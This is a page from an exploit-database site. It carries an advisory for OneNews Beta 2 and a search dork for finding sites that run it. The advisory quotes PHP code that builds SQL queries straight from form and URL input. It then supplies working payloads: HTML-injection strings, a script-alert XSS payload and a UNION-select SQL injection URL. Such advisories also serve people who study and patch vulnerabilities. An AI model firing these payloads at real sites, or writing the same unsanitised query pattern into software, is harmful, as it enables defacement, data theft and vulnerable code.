0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities
=========================================================== OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities =========================================================== ______________________///////////////\\\\\\\\\\\\\\\____________________ }Name : OneNews Beta 2 Multiple Vulnerabilities { {Dork : Powered by One-News } _________________________________{}*{}__________________________________ ========================== |1. XSS and html injection| ========================== Conditions: MAGIC_QUOTES=ON/OFF Vulnerable code(add.php): --------------------------------------CODE---------------------------------------------- $insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')"; mysql_query($insert) or die ('I cannot do that because ' . mysql_error()); --------------------------------------CODE---------------------------------------------- Vulnerable code(index.php): --------------------------------------CODE---------------------------------------------- $insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "', '" . $_POST['comment'] . "')"; mysql_query($insert) or die ('I cannot do that because ' . mysql_error()); --------------------------------------CODE---------------------------------------------- NOTE: To exploit the bug in the add.php code, you have got to be logged in!!! Exploit: Put this down into the forms, while adding comments(index.php) or news(add.php): 1. <h1>HACKED</h1> 2. <html><head></head><body bgcolor=\"red\">HACKED</body></html> 3. <script>alert(\'Hacked\');</script> 4. Use your imagination :) ========================== |2. SQL Injection | ========================== Conditions: MAGIC_QUOTES=OFF Vulnerable code(index.php): --------------------------------------CODE---------------------------------------------- $query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1"; $result = mysql_query($query); while($row = mysql_fetch_array($result)){ --------------------------------------CODE---------------------------------------------- Exploit: http://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* # 0day.today [2024-07-07] #